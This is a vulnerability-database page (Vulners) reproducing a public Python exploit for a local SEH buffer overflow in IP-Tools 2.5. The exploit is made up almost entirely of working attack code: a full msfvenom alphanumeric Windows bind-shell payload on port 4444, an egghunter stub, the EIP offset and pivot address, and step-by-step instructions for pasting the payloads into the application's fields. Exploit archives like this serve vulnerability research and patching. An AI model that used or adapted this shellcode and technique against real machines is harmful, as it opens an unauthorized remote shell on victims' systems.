Vulners
Lucene search
IP-Tools 2.5 - 'Log to file' Local Buffer Overflow (SEH) (Egghunter)
#!/usr/bin/env python
#------------------------------------------------------------------------------------------------------------------------------------#
# Exploit: IP-Tools 2.5 - Local Buffer Overflow(EggHunter) #
# Date: 2019-02-06 #
# Author: Juan Prescotto #
# Tested Against: Win7 Pro SP1 64 bit #
# Software Download #1: https://web.archive.org/web/20070322163021/http://hostmonitor.biz:80/download/ip-tools.exe #
# Software Download #2: https://www.exploit-db.com/apps/4a83348f18a18ba34f9747648b550307-ip-tools.exe #
# Version: 2.5 #
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine #
# Steps : Open the APP > SNMP Scanner > paste in contents from the egg.txt into "From Addr" > "Start" > Click "Options" > #
# "Host Monitor" --> "Logging" > paste in contents from the egghunter.txt into "Log to file" > OK > Bind Shell - Port 4444 #
#------------------------------------------------------------------------------------------------------------------------------------#
# Good Characers: alphanumeric and printable special characters #
# EIP Offset Overwrite ("Log to file" field): 264 #
# Non-Participating Modules: ip_tools.exe #
#------------------------------------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite --> #
# Stack Adjust (0x40) / RETN --> Egghunter Shellcode --> Egg Shellcode #
#------------------------------------------------------------------------------------------------------------------------------------#
##################EGG Shellcode Generation#################################
#msfvenom -p windows/shell_bind_tcp LPORT=4444 BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
#710 bytes + 8 bytes for egg identifier
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x69\x6c\x4b\x58\x6d\x52\x35\x50\x35\x50\x75\x50\x63"
egg += "\x50\x4f\x79\x4d\x35\x36\x51\x4b\x70\x71\x74\x6e\x6b"
egg += "\x36\x30\x46\x50\x6e\x6b\x66\x32\x44\x4c\x6c\x4b\x63"
egg += "\x62\x54\x54\x4c\x4b\x72\x52\x65\x78\x34\x4f\x68\x37"
egg += "\x52\x6a\x34\x66\x50\x31\x59\x6f\x4c\x6c\x57\x4c\x53"
egg += "\x51\x71\x6c\x67\x72\x54\x6c\x31\x30\x5a\x61\x58\x4f"
egg += "\x34\x4d\x56\x61\x4f\x37\x68\x62\x4a\x52\x36\x32\x66"
egg += "\x37\x4e\x6b\x36\x32\x42\x30\x6c\x4b\x50\x4a\x35\x6c"
egg += "\x4c\x4b\x72\x6c\x44\x51\x44\x38\x78\x63\x32\x68\x55"
egg += "\x51\x78\x51\x43\x61\x6e\x6b\x76\x39\x45\x70\x75\x51"
egg += "\x59\x43\x6e\x6b\x33\x79\x42\x38\x4d\x33\x65\x6a\x71"
egg += "\x59\x6e\x6b\x36\x54\x4e\x6b\x36\x61\x78\x56\x46\x51"
egg += "\x49\x6f\x4e\x4c\x79\x51\x7a\x6f\x66\x6d\x35\x51\x48"
egg += "\x47\x36\x58\x79\x70\x30\x75\x39\x66\x33\x33\x33\x4d"
egg += "\x58\x78\x57\x4b\x73\x4d\x56\x44\x53\x45\x48\x64\x61"
egg += "\x48\x4e\x6b\x72\x78\x67\x54\x57\x71\x69\x43\x73\x56"
egg += "\x6e\x6b\x54\x4c\x50\x4b\x6c\x4b\x53\x68\x37\x6c\x73"
egg += "\x31\x58\x53\x4c\x4b\x74\x44\x4e\x6b\x67\x71\x48\x50"
egg += "\x4f\x79\x70\x44\x36\x44\x76\x44\x51\x4b\x71\x4b\x55"
egg += "\x31\x46\x39\x32\x7a\x63\x61\x4b\x4f\x6b\x50\x53\x6f"
egg += "\x61\x4f\x61\x4a\x4c\x4b\x62\x32\x6a\x4b\x6e\x6d\x31"
egg += "\x4d\x63\x58\x75\x63\x54\x72\x35\x50\x45\x50\x33\x58"
egg += "\x52\x57\x33\x43\x36\x52\x73\x6f\x62\x74\x33\x58\x30"
egg += "\x4c\x31\x67\x54\x66\x63\x37\x69\x6f\x6e\x35\x78\x38"
egg += "\x4e\x70\x63\x31\x37\x70\x43\x30\x35\x79\x4f\x34\x32"
egg += "\x74\x46\x30\x51\x78\x36\x49\x4f\x70\x52\x4b\x63\x30"
egg += "\x59\x6f\x38\x55\x73\x5a\x43\x38\x70\x59\x36\x30\x49"
egg += "\x72\x59\x6d\x57\x30\x52\x70\x47\x30\x50\x50\x51\x78"
egg += "\x5a\x4a\x44\x4f\x6b\x6f\x79\x70\x39\x6f\x39\x45\x4f"
egg += "\x67\x65\x38\x44\x42\x77\x70\x64\x51\x71\x4c\x6c\x49"
egg += "\x6d\x36\x32\x4a\x72\x30\x63\x66\x56\x37\x30\x68\x68"
egg += "\x42\x4b\x6b\x64\x77\x61\x77\x59\x6f\x39\x45\x70\x57"
egg += "\x35\x38\x6d\x67\x68\x69\x65\x68\x59\x6f\x6b\x4f\x4a"
egg += "\x75\x36\x37\x75\x38\x34\x34\x58\x6c\x57\x4b\x4d\x31"
egg += "\x49\x6f\x4a\x75\x51\x47\x4e\x77\x55\x38\x32\x55\x52"
egg += "\x4e\x70\x4d\x43\x51\x39\x6f\x6e\x35\x51\x78\x70\x63"
egg += "\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63"
egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49"
egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51"
egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64"
egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72"
egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76"
egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45"
egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e"
egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b"
egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70"
egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d"
egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c"
egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f"
egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70"
egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41"
f = open ("egg.txt", "w")
f.write(egg)
f.close()
##################EGG Hunter Shellcode Generation#################################
#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000)
#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p -
#150 bytes
egghunter = ""
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b"
egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50"
egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52"
egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49"
egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e"
egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38"
egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a"
egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71"
egghunter += "\x69\x6f\x6a\x47\x41\x41"
#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE]
eip = "\x59\x32\x47\x00"
buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip
f = open ("egghunter.txt", "w")
f.write(buffer)
f.close()Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Feb 2019 00:00Current
7.4High risk
Vulners AI Score7.4